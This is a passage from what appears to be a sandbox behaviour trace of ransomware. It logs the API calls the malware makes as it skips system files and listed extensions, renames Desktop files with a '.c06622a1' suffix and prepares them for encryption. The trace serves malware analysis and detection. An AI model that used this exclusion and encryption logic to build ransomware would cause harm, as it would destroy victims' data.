(_Str1="lnk", _Str2="m4a") returned -1 [0156.120] wcslen (_String="lnk") returned 0x3 [0156.120] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0156.120] wcslen (_String="mod") returned 0x3 [0156.120] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0156.120] wcslen (_String="mpa") returned 0x3 [0156.120] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0156.120] wcslen (_String="msc") returned 0x3 [0156.120] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0156.120] wcslen (_String="msp") returned 0x3 [0156.120] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0156.121] wcslen (_String="msstyles") returned 0x8 [0156.121] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0156.121] wcslen (_String="msu") returned 0x3 [0156.121] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0156.121] wcslen (_String="nls") returned 0x3 [0156.121] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0156.121] wcslen (_String="nomedia") returned 0x7 [0156.121] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0156.121] wcslen (_String="ocx") returned 0x3 [0156.121] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0156.121] wcslen (_String="prf") returned 0x3 [0156.121] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0156.121] wcslen (_String="ps1") returned 0x3 [0156.121] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0156.121] wcslen (_String="rom") returned 0x3 [0156.121] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0156.121] wcslen (_String="rtp") returned 0x3 [0156.121] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0156.121] wcslen (_String="scr") returned 0x3 [0156.121] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0156.121] wcslen (_String="shs") returned 0x3 [0156.121] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0156.121] wcslen (_String="spl") returned 0x3 [0156.121] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0156.121] wcslen (_String="sys") returned 0x3 [0156.121] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0156.121] wcslen (_String="theme") returned 0x5 [0156.121] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0156.121] wcslen (_String="themepack") returned 0x9 [0156.121] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0156.121] wcslen (_String="wpx") returned 0x3 [0156.121] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0156.121] wcslen (_String="lock") returned 0x4 [0156.122] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0156.122] wcslen (_String="key") returned 0x3 [0156.122] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0156.122] wcslen (_String="hta") returned 0x3 [0156.122] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0156.122] wcslen (_String="msi") returned 0x3 [0156.122] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0156.122] wcslen (_String="pdb") returned 0x3 [0156.122] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0156.122] wcslen (_String="sqlite") returned 0x6 [0156.122] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.122] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.122] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.122] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.122] wcscpy (in: _Dest=0x208e74, _Source="kndXrUZ5-qVM-oAY.m4a" | out: _Dest="kndXrUZ5-qVM-oAY.m4a") returned="kndXrUZ5-qVM-oAY.m4a" [0156.122] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kndXrUZ5-qVM-oAY.m4a", dwFileAttributes=0x80) returned 1 [0156.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kndXrUZ5-qVM-oAY.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kndxruz5-qvm-oay.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0156.122] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.123] ReadFile (in: hFile=0x1d0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.123] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x9c1c4ab0 [0156.123] RtlComputeCrc32 (PartialCrc=0x4ab0, Buffer=0x32ec24, Length=0x80) returned 0x77a47f92 [0156.123] RtlComputeCrc32 (PartialCrc=0x7f92, Buffer=0x32ec24, Length=0x80) returned 0x798223a3 [0156.123] RtlComputeCrc32 (PartialCrc=0x23a3, Buffer=0x32ec24, Length=0x80) returned 0xfe5ee07d [0156.123] RtlComputeCrc32 (PartialCrc=0xe07d, Buffer=0x32ec24, Length=0x80) returned 0xa3103966 [0156.123] CloseHandle (hObject=0x1d0) returned 1 [0156.124] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.124] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kndXrUZ5-qVM-oAY.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kndXrUZ5-qVM-oAY.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kndXrUZ5-qVM-oAY.m4a" [0156.124] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kndXrUZ5-qVM-oAY.m4a") returned 0x3e [0156.124] wcscpy (in: _Dest=0x218ea4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.124] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kndXrUZ5-qVM-oAY.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kndxruz5-qvm-oay.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kndXrUZ5-qVM-oAY.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kndxruz5-qvm-oay.m4a.c06622a1"), dwFlags=0x8) returned 1 [0156.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kndXrUZ5-qVM-oAY.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kndxruz5-qvm-oay.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0156.126] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.126] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x35a0020 [0156.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4901db26 [0156.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x402510e6 [0156.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x65498c67 [0156.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e55ac19 [0156.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3ea18ede [0156.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6d408b30 [0156.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xaa31b8f [0156.133] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2388958a [0156.137] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x35a0094, Length=0x80) returned 0x1d545527 [0156.137] RtlComputeCrc32 (PartialCrc=0x5527, Buffer=0x35a0094, Length=0x80) returned 0x4e2ccb91 [0156.137] RtlComputeCrc32 (PartialCrc=0xcb91, Buffer=0x35a0094, Length=0x80) returned 0x63804b [0156.137] RtlComputeCrc32 (PartialCrc=0x804b, Buffer=0x35a0094, Length=0x80) returned 0x7179d63f [0156.137] RtlComputeCrc32 (PartialCrc=0xd63f, Buffer=0x35a0094, Length=0x80) returned 0x9e480384 [0156.137] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0156.137] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.137] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.137] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaa805f0, ftCreationTime.dwHighDateTime=0x1d5e6ef, ftLastAccessTime.dwLowDateTime=0xf0cbd720, ftLastAccessTime.dwHighDateTime=0x1d5dd5f, ftLastWriteTime.dwLowDateTime=0xf0cbd720, ftLastWriteTime.dwHighDateTime=0x1d5dd5f, nFileSizeHigh=0x0, nFileSizeLow=0xcb39, dwReserved0=0x0, dwReserved1=0x0, cFileName="KReoraVUftmC6RXh.gif", cAlternateFileName="KREORA~1.GIF")) returned 1 [0156.137] _wcsicmp (_Str1="KReoraVUftmC6RXh.gif", _Str2="README.c06622a1.TXT") returned -7 [0156.137] wcsstr (_Str="KReoraVUftmC6RXh.gif", _SubStr="README") returned 0x0 [0156.137] _wcsicmp (_Str1="autorun.inf", _Str2="KReoraVUftmC6RXh.gif") returned -10 [0156.137] wcslen (_String="autorun.inf") returned 0xb [0156.137] _wcsicmp (_Str1="boot.ini", _Str2="KReoraVUftmC6RXh.gif") returned -9 [0156.137] wcslen (_String="boot.ini") returned 0x8 [0156.137] _wcsicmp (_Str1="bootfont.bin", _Str2="KReoraVUftmC6RXh.gif") returned -9 [0156.137] wcslen (_String="bootfont.bin") returned 0xc [0156.137] _wcsicmp (_Str1="bootsect.bak", _Str2="KReoraVUftmC6RXh.gif") returned -9 [0156.137] wcslen (_String="bootsect.bak") returned 0xc [0156.137] _wcsicmp (_Str1="desktop.ini", _Str2="KReoraVUftmC6RXh.gif") returned -7 [0156.137] wcslen (_String="desktop.ini") returned 0xb [0156.137] _wcsicmp (_Str1="iconcache.db", _Str2="KReoraVUftmC6RXh.gif") returned -2 [0156.137] wcslen (_String="iconcache.db") returned 0xc [0156.137] _wcsicmp (_Str1="ntldr", _Str2="KReoraVUftmC6RXh.gif") returned 3 [0156.137] wcslen (_String="ntldr") returned 0x5 [0156.137] _wcsicmp (_Str1="ntuser.dat", _Str2="KReoraVUftmC6RXh.gif") returned 3 [0156.137] wcslen (_String="ntuser.dat") returned 0xa [0156.137] _wcsicmp (_Str1="ntuser.dat.log", _Str2="KReoraVUftmC6RXh.gif") returned 3 [0156.137] wcslen (_String="ntuser.dat.log") returned 0xe [0156.138] _wcsicmp (_Str1="ntuser.ini", _Str2="KReoraVUftmC6RXh.gif") returned 3 [0156.138] wcslen (_String="ntuser.ini") returned 0xa [0156.138] _wcsicmp (_Str1="thumbs.db", _Str2="KReoraVUftmC6RXh.gif") returned 9 [0156.138] wcslen (_String="thumbs.db") returned 0x9 [0156.138] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0156.138] wcslen (_String="386") returned 0x3 [0156.138] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0156.138] wcslen (_String="adv") returned 0x3 [0156.138] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0156.138] wcslen (_String="ani") returned 0x3 [0156.138] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0156.138] wcslen (_String="bat") returned 0x3 [0156.138] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0156.138] wcslen (_String="bin") returned 0x3 [0156.138] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0156.138] wcslen (_String="cab") returned 0x3 [0156.138] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0156.138] wcslen (_String="cmd") returned 0x3 [0156.138] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0156.138] wcslen (_String="com") returned 0x3 [0156.138] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0156.138] wcslen (_String="cpl") returned 0x3 [0156.138] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0156.138] wcslen (_String="cur") returned 0x3 [0156.138] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0156.138] wcslen (_String="deskthemepack") returned 0xd [0156.138] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0156.138] wcslen (_String="diagcab") returned 0x7 [0156.138] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0156.138] wcslen (_String="diagcfg") returned 0x7 [0156.138] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0156.139] wcslen (_String="diagpkg") returned 0x7 [0156.139] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0156.139] wcslen (_String="dll") returned 0x3 [0156.139] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0156.139] wcslen (_String="drv") returned 0x3 [0156.139] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0156.139] wcslen (_String="exe") returned 0x3 [0156.139] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0156.139] wcslen (_String="hlp") returned 0x3 [0156.139] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0156.139] wcslen (_String="icl") returned 0x3 [0156.139] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0156.139] wcslen (_String="icns") returned 0x4 [0156.139] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0156.139] wcslen (_String="ico") returned 0x3 [0156.139] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0156.139] wcslen (_String="ics") returned 0x3 [0156.139] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0156.139] wcslen (_String="idx") returned 0x3 [0156.139] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0156.139] wcslen (_String="ldf") returned 0x3 [0156.139] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0156.139] wcslen (_String="lnk") returned 0x3 [0156.139] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0156.139] wcslen (_String="mod") returned 0x3 [0156.139] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0156.139] wcslen (_String="mpa") returned 0x3 [0156.139] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0156.139] wcslen (_String="msc") returned 0x3 [0156.139] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0156.139] wcslen (_String="msp") returned 0x3 [0156.139] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0156.140] wcslen (_String="msstyles") returned 0x8 [0156.140] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0156.140] wcslen (_String="msu") returned 0x3 [0156.140] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0156.140] wcslen (_String="nls") returned 0x3 [0156.140] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0156.140] wcslen (_String="nomedia") returned 0x7 [0156.140] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0156.140] wcslen (_String="ocx") returned 0x3 [0156.140] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0156.140] wcslen (_String="prf") returned 0x3 [0156.140] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0156.140] wcslen (_String="ps1") returned 0x3 [0156.140] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0156.140] wcslen (_String="rom") returned 0x3 [0156.140] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0156.140] wcslen (_String="rtp") returned 0x3 [0156.140] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0156.140] wcslen (_String="scr") returned 0x3 [0156.140] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0156.140] wcslen (_String="shs") returned 0x3 [0156.140] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0156.140] wcslen (_String="spl") returned 0x3 [0156.140] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0156.140] wcslen (_String="sys") returned 0x3 [0156.140] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0156.140] wcslen (_String="theme") returned 0x5 [0156.140] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0156.140] wcslen (_String="themepack") returned 0x9 [0156.140] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0156.140] wcslen (_String="wpx") returned 0x3 [0156.140] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0156.141] wcslen (_String="lock") returned 0x4 [0156.141] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0156.141] wcslen (_String="key") returned 0x3 [0156.141] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0156.141] wcslen (_String="hta") returned 0x3 [0156.141] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0156.141] wcslen (_String="msi") returned 0x3 [0156.141] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0156.141] wcslen (_String="pdb") returned 0x3 [0156.141] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0156.141] wcslen (_String="sqlite") returned 0x6 [0156.141] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.141] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.141] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.141] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.141] wcscpy (in: _Dest=0x208e74, _Source="KReoraVUftmC6RXh.gif" | out: _Dest="KReoraVUftmC6RXh.gif") returned="KReoraVUftmC6RXh.gif" [0156.141] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KReoraVUftmC6RXh.gif", dwFileAttributes=0x80) returned 1 [0156.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KReoraVUftmC6RXh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kreoravuftmc6rxh.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0156.142] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.142] ReadFile (in: hFile=0x1e0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.142] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x38734505 [0156.142] RtlComputeCrc32 (PartialCrc=0x4505, Buffer=0x32ec24, Length=0x80) returned 0x78dd35cb [0156.142] RtlComputeCrc32 (PartialCrc=0x35cb, Buffer=0x32ec24, Length=0x80) returned 0x7e70ae4a [0156.142] RtlComputeCrc32 (PartialCrc=0xae4a, Buffer=0x32ec24, Length=0x80) returned 0x99871bfe [0156.142] RtlComputeCrc32 (PartialCrc=0x1bfe, Buffer=0x32ec24, Length=0x80) returned 0x8a4c3e42 [0156.142] CloseHandle (hObject=0x1e0) returned 1 [0156.143] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.143] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KReoraVUftmC6RXh.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KReoraVUftmC6RXh.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KReoraVUftmC6RXh.gif" [0156.143] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KReoraVUftmC6RXh.gif") returned 0x3e [0156.143] wcscpy (in: _Dest=0x218ea4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.143] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KReoraVUftmC6RXh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kreoravuftmc6rxh.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KReoraVUftmC6RXh.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kreoravuftmc6rxh.gif.c06622a1"), dwFlags=0x8) returned 1 [0156.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KReoraVUftmC6RXh.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kreoravuftmc6rxh.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e0 [0156.145] CreateIoCompletionPort (FileHandle=0x1e0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.145] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3630020 [0156.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x54de349b [0156.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x19e13dd9 [0156.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xe02fa00 [0156.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3d59a31c [0156.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x718c33ef [0156.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x74f57537 [0156.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e370a6a [0156.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x37cea208 [0156.156] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3630094, Length=0x80) returned 0xa5e208e [0156.156] RtlComputeCrc32 (PartialCrc=0x208e, Buffer=0x3630094, Length=0x80) returned 0xd4c73653 [0156.156] RtlComputeCrc32 (PartialCrc=0x3653, Buffer=0x3630094, Length=0x80) returned 0x25b51b49 [0156.156] RtlComputeCrc32 (PartialCrc=0x1b49, Buffer=0x3630094, Length=0x80) returned 0xb9df987a [0156.156] RtlComputeCrc32 (PartialCrc=0x987a, Buffer=0x3630094, Length=0x80) returned 0x83567362 [0156.156] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0156.156] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.156] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.156] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc83799f0, ftCreationTime.dwHighDateTime=0x1d5d8f2, ftLastAccessTime.dwLowDateTime=0xb6a529a0, ftLastAccessTime.dwHighDateTime=0x1d5e20c, ftLastWriteTime.dwLowDateTime=0xb6a529a0, ftLastWriteTime.dwHighDateTime=0x1d5e20c, nFileSizeHigh=0x0, nFileSizeLow=0x155bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="lL rT_iquJbDmlvt9l9.png", cAlternateFileName="LLRT_I~1.PNG")) returned 1 [0156.156] _wcsicmp (_Str1="lL rT_iquJbDmlvt9l9.png", _Str2="README.c06622a1.TXT") returned -6 [0156.156] wcsstr (_Str="lL rT_iquJbDmlvt9l9.png", _SubStr="README") returned 0x0 [0156.156] _wcsicmp (_Str1="autorun.inf", _Str2="lL rT_iquJbDmlvt9l9.png") returned -11 [0156.156] wcslen (_String="autorun.inf") returned 0xb [0156.156] _wcsicmp (_Str1="boot.ini", _Str2="lL rT_iquJbDmlvt9l9.png") returned -10 [0156.156] wcslen (_String="boot.ini") returned 0x8 [0156.156] _wcsicmp (_Str1="bootfont.bin", _Str2="lL rT_iquJbDmlvt9l9.png") returned -10 [0156.157] wcslen (_String="bootfont.bin") returned 0xc [0156.157] _wcsicmp (_Str1="bootsect.bak", _Str2="lL rT_iquJbDmlvt9l9.png") returned -10 [0156.157] wcslen (_String="bootsect.bak") returned 0xc [0156.157] _wcsicmp (_Str1="desktop.ini", _Str2="lL rT_iquJbDmlvt9l9.png") returned -8 [0156.157] wcslen (_String="desktop.ini") returned 0xb [0156.157] _wcsicmp (_Str1="iconcache.db", _Str2="lL rT_iquJbDmlvt9l9.png") returned -3 [0156.157] wcslen (_String="iconcache.db") returned 0xc [0156.157] _wcsicmp (_Str1="ntldr", _Str2="lL rT_iquJbDmlvt9l9.png") returned 2 [0156.157] wcslen (_String="ntldr") returned 0x5 [0156.157] _wcsicmp (_Str1="ntuser.dat", _Str2="lL rT_iquJbDmlvt9l9.png") returned 2 [0156.157] wcslen (_String="ntuser.dat") returned 0xa [0156.157] _wcsicmp (_Str1="ntuser.dat.log", _Str2="lL rT_iquJbDmlvt9l9.png") returned 2 [0156.157] wcslen (_String="ntuser.dat.log") returned 0xe [0156.157] _wcsicmp (_Str1="ntuser.ini", _Str2="lL rT_iquJbDmlvt9l9.png") returned 2 [0156.157] wcslen (_String="ntuser.ini") returned 0xa [0156.157] _wcsicmp (_Str1="thumbs.db", _Str2="lL rT_iquJbDmlvt9l9.png") returned 8 [0156.157] wcslen (_String="thumbs.db") returned 0x9 [0156.157] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0156.157] wcslen (_String="386") returned 0x3 [0156.157] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0156.157] wcslen (_String="adv") returned 0x3 [0156.157] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0156.157] wcslen (_String="ani") returned 0x3 [0156.157] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0156.157] wcslen (_String="bat") returned 0x3 [0156.157] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0156.157] wcslen (_String="bin") returned 0x3 [0156.158] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0156.158] wcslen (_String="cab") returned 0x3 [0156.158] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0156.158] wcslen (_String="cmd") returned 0x3 [0156.158] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0156.158] wcslen (_String="com") returned 0x3 [0156.158] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0156.158] wcslen (_String="cpl") returned 0x3 [0156.158] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0156.158] wcslen (_String="cur") returned 0x3 [0156.158] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0156.158] wcslen (_String="deskthemepack") returned 0xd [0156.158] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0156.158] wcslen (_String="diagcab") returned 0x7 [0156.158] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0156.158] wcslen (_String="diagcfg") returned 0x7 [0156.158] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0156.158] wcslen (_String="diagpkg") returned 